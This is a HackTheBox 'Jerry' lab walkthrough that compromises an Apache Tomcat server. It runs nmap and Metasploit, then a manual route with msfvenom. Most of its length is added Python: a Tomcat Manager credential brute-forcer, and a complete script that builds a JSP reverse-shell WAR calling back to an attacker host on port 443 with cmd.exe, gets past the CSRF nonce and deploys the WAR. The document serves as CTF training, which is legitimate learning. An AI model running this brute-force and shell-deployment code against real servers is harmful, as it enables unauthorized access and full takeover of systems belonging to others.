Jerry Walkthrough
Hello everyone! Today we have another machine from HackTheBox, "Jerry". We will deal with this machine twice: first with Metasploit, then with manual exploitation. Let's look at the machine's info first.
Okay, let's get started...
First we scan the machine's IP, 10.10.10.95, with nmap to find the open ports, the running services, OS info and other details. The command is
nmap -A -T4 -oG jerry.gnmap 10.10.10.95
(-A turns on version detection, OS detection, default scripts and traceroute; -oG writes a grepable copy of the output to jerry.gnmap) and the results are as you see here.
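A small parser for the grepable file that -oG writes, added here as an example and not taken from the original post. The sample scan line is constructed to mirror what nmap prints for Jerry's Tomcat banner, and the function names are my own.

```python
import re

# Constructed sample of nmap grepable output (-oG), not the author's scan file.
# Port entries are port/state/proto/owner/service/rpcinfo/version/, and a '/'
# inside a field (here in the Tomcat banner) is escaped by nmap as '\/'.
SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated as: nmap -A -T4 -oG jerry.gnmap 10.10.10.95\n"
    "Host: 10.10.10.95 ()\tStatus: Up\n"
    "Host: 10.10.10.95 ()\tPorts: 8080/open/tcp//http//"
    "Apache Tomcat\\/Coyote JSP engine 1.1/\tIgnored State: filtered (999)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned in 45.12 seconds\n"
)

FIELDS = ("port", "state", "proto", "owner", "service", "rpcinfo", "version")


def parse_gnmap(text):
    """Return {host: [port records]} for every 'Ports:' line in a .gnmap file."""
    hosts = {}
    for line in text.splitlines():
        m = re.match(r"Host: (\S+) \([^)]*\)\tPorts: ([^\t]*)", line)
        if not m:
            continue
        host, ports = m.groups()
        for entry in ports.split(", "):
            # split on '/' that is not escaped; zip() drops the trailing empty field
            parts = [p.replace("\\/", "/") for p in re.split(r"(?<!\\)/", entry)]
            rec = dict(zip(FIELDS, parts))
            rec["port"] = int(rec["port"])
            hosts.setdefault(host, []).append(rec)
    return hosts


def version_disclosing_ports(hosts):
    """(host, port, version) for open ports whose banner leaks a product/version string."""
    found = []
    for host, recs in hosts.items():
        for r in recs:
            if r["state"] == "open" and r.get("version"):
                found.append((host, r["port"], r["version"]))
    return found


if __name__ == "__main__":
    for host, port, version in version_disclosing_ports(parse_gnmap(SAMPLE_GNMAP)):
        print(f"{host}:{port} -> {version}")
```

Run it against the real jerry.gnmap by reading the file into parse_gnmap; the version column is where the "Apache Tomcat/Coyote JSP engine 1.1" banner the next paragraph talks about ends up.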
You should note something odd: Tomcat does not normally reveal its version, but here it does, so that is something we can take as an entry point.
The second thing to note is that port 8080 is open, so let's open it in the browser at 10.10.10.95:8080.
You will find the same server version that nmap reported, so note this information.
I used exploit-db, rapid7 and searchsploit to search for CVEs related to these keywords (tomcat / coyote / tomcat 7.0.88), and the results all recommend the same CVE.
It comes down to this: a user with the manager or admin role can deploy a WAR file through the Tomcat Manager, and that WAR can carry a web shell instead of a real application. Strictly speaking this is the Manager working as designed rather than a bug, which is why every write-up of it starts from credentials. So from this information we first need to be the manager or the admin (have an admin account), and then we can use Metasploit or manual exploitation to open a reverse shell. Let's first try to get an admin account.
In this step we brute-force directories, trying to find any leaked data containing account credentials. We could use ffuf, dirbuster, dirsearch, gobuster or Metasploit modules; I'll use Metasploit for this step.
I used scanner/http/dir_scanner to discover hidden directories, and as you can see there is nothing useful, because the /manager directory, for example, requires an authenticated user.
Let's search for tomcat to see if we can find another exploit: search tomcat
As you can see, all of these exploits require an authenticated user, so we will use the auxiliary module scanner/http/tomcat_mgr_login to brute-force the username and password; edit the default options as follows.
The results...
We have a successful login here with username tomcat and password s3cret.
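What tomcat_mgr_login does underneath, as an added Python example that is not part of the original write-up: the Manager is protected by plain HTTP Basic authentication on /manager/html, so a short loop over candidate pairs does the same job. The user and password lists here are constructed, and the injectable `fetch` parameter is an assumption of this example so the logic can be exercised without the box.

```python
import base64
import itertools
import time
import urllib.error
import urllib.request

# Constructed candidate lists; tomcat:s3cret is the pair the write-up found.
# The default-credential lists that tomcat_mgr_login ships with look much like this.
USERS = ["admin", "manager", "tomcat", "root"]
PASSWORDS = ["admin", "manager", "tomcat", "s3cret", "password"]


def basic_auth_header(user, password):
    """Value of the Authorization header the Manager's BASIC realm expects."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def http_status(url, auth_header, timeout=5):
    """Send one authenticated GET and return only the HTTP status code."""
    req = urllib.request.Request(url, headers={"Authorization": auth_header})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def brute_force_manager(base_url, users, passwords, fetch=http_status, delay=0.5):
    """Try every user/password pair against /manager/html.

    Tomcat answers 401 for wrong credentials, 403 for a valid account that
    lacks the manager-gui role, and 200 for a usable manager login.  The
    'fetch' callable is injected so the logic can be exercised offline.
    """
    url = base_url.rstrip("/") + "/manager/html"
    for user, password in itertools.product(users, passwords):
        status = fetch(url, basic_auth_header(user, password))
        if status in (200, 403):
            return {"user": user, "password": password,
                    "status": status, "manager_role": status == 200}
        # Tomcat's stock server.xml wraps the realm in a LockOutRealm (5 failures
        # lock the account for 300 s), after which even the right password gets
        # a 401: pace the attempts rather than blasting the whole list.
        time.sleep(delay)
    return None


if __name__ == "__main__":
    print(brute_force_manager("http://10.10.10.95:8080", USERS, PASSWORDS))
```

A 403 is worth keeping: the credentials are right, the account just lacks the manager-gui role for that path, and /manager/text or the admin webapp may still accept them.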
I tried to log in to 10.10.10.95:8080/manager with the credentials above and it worked.
Now we use the exploit module multi/http/tomcat_mgr_upload, set its options with the username and the password as shown here, then type run.
That's great, we have a shell now. Let's see our role.
Good, we're admin, so let's search for the flags.
Here we find both flags in one place, in the Administrator user's directory.
Congrats ❤ Let's try the second method: manual exploitation.
We can upload a WAR file, as you can see here on the manager page under "WAR file to deploy": select a WAR file to upload.
So we generate a shell with msfvenom as follows; here are all the payloads related to Java. The usual command is
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<your VPN IP> LPORT=443 -f war -o shell.war
Good, now we have a reverse shell packaged as shell.war.
Let's upload it and then request it. Tomcat deploys a WAR under a context path named after the file, so shell.war is reached at 10.10.10.95:8080/shell/ (requesting /shell.war returns a 404).
At the same time, open nc to listen on port 443 (nc -lvnp 443) as follows, and as you can see it worked :)
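The manual method above, and what multi/http/tomcat_mgr_upload automates, as an added Python example that is not from the original post: it builds the WAR itself instead of calling msfvenom, uploads it through the Manager's HTML upload form (fetching the CSRF nonce Tomcat 7 requires), and prints the context URL to request. The attacker address 10.10.14.2 and the file name cmd.jsp are assumptions; the JSP follows the same connect-back-and-pipe-cmd.exe pattern as java/jsp_shell_reverse_tcp.

```python
import base64
import io
import re
import uuid
import zipfile
import urllib.request

# JSP reverse shell (same idea as java/jsp_shell_reverse_tcp): connect back,
# spawn cmd.exe, and pipe its stdin/stdout/stderr over the socket.
JSP_SHELL = """<%@ page import="java.io.*,java.net.*" %>
<%
class Pipe extends Thread {
    InputStream src; OutputStream dst;
    Pipe(InputStream s, OutputStream d) { src = s; dst = d; }
    public void run() {
        try {
            byte[] buf = new byte[8192]; int n;
            while ((n = src.read(buf)) > 0) { dst.write(buf, 0, n); dst.flush(); }
        } catch (Exception e) {}
    }
}
try {
    Socket sock = new Socket("__LHOST__", __LPORT__);
    Process proc = Runtime.getRuntime().exec("cmd.exe");
    new Pipe(proc.getInputStream(), sock.getOutputStream()).start();
    new Pipe(proc.getErrorStream(), sock.getOutputStream()).start();
    new Pipe(sock.getInputStream(), proc.getOutputStream()).start();
} catch (Exception e) {}
%>
"""

# web.xml names the JSP as welcome file, so a request to the context root runs it.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list><welcome-file>__JSP__</welcome-file></welcome-file-list>
</web-app>
"""


def build_war(lhost, lport, jsp_name="cmd.jsp"):
    """Return the bytes of a WAR holding WEB-INF/web.xml and the JSP shell."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML.replace("__JSP__", jsp_name))
        war.writestr(jsp_name, JSP_SHELL.replace("__LHOST__", lhost)
                                        .replace("__LPORT__", str(lport)))
    return buf.getvalue()


def war_entries(war_bytes):
    """{name: text} of everything inside a WAR, to check it before uploading."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return {n: war.read(n).decode() for n in war.namelist()}


def context_url(base_url, war_name):
    """Tomcat deploys foo.war at /foo/, so that (not /foo.war) is the URL to hit."""
    stem = war_name[:-4] if war_name.endswith(".war") else war_name
    return base_url.rstrip("/") + "/" + stem + "/"


def extract_nonce(manager_html):
    """Tomcat 7+ HTML manager rejects POSTs without the CSRF nonce in its links."""
    m = re.search(r"CSRF_NONCE=([0-9A-Fa-f]+)", manager_html)
    if not m:
        raise ValueError("no CSRF nonce found; is this the /manager/html page?")
    return m.group(1)


def multipart_form(field, filename, data):
    """Build a single-file multipart/form-data body the way the browser form does."""
    boundary = "----pyboundary" + uuid.uuid4().hex
    head = (f"--{boundary}\r\nContent-Disposition: form-data; "
            f'name="{field}"; filename="{filename}"\r\n'
            "Content-Type: application/octet-stream\r\n\r\n").encode()
    body = head + data + f"\r\n--{boundary}--\r\n".encode()
    return body, f"multipart/form-data; boundary={boundary}"


def deploy_war(base_url, user, password, war_name, war_bytes):
    """Upload via /manager/html/upload, the form behind 'WAR file to deploy'."""
    base = base_url.rstrip("/")
    auth = "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(base + "/manager/html", headers={"Authorization": auth})
    with urllib.request.urlopen(req, timeout=10) as resp:
        nonce = extract_nonce(resp.read().decode("utf-8", "replace"))
    body, ctype = multipart_form("deployWar", war_name, war_bytes)
    req = urllib.request.Request(
        f"{base}/manager/html/upload?org.apache.catalina.filters.CSRF_NONCE={nonce}",
        data=body, method="POST",
        headers={"Authorization": auth, "Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.status  # 200; the returned page lists the new context


if __name__ == "__main__":
    # Assumed attacker address; start `nc -lvnp 443` before requesting the context URL.
    war = build_war("10.10.14.2", 443)
    print(deploy_war("http://10.10.10.95:8080", "tomcat", "s3cret", "shell.war", war))
    print("now request", context_url("http://10.10.10.95:8080", "shell.war"))
```

Undeploying afterwards (the Undeploy button on the same page, or /manager/html/undeploy?path=/shell with the nonce) removes the context and the JSP from the box.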
Here we finished ❤
Congrats ❤
Stay in touch :)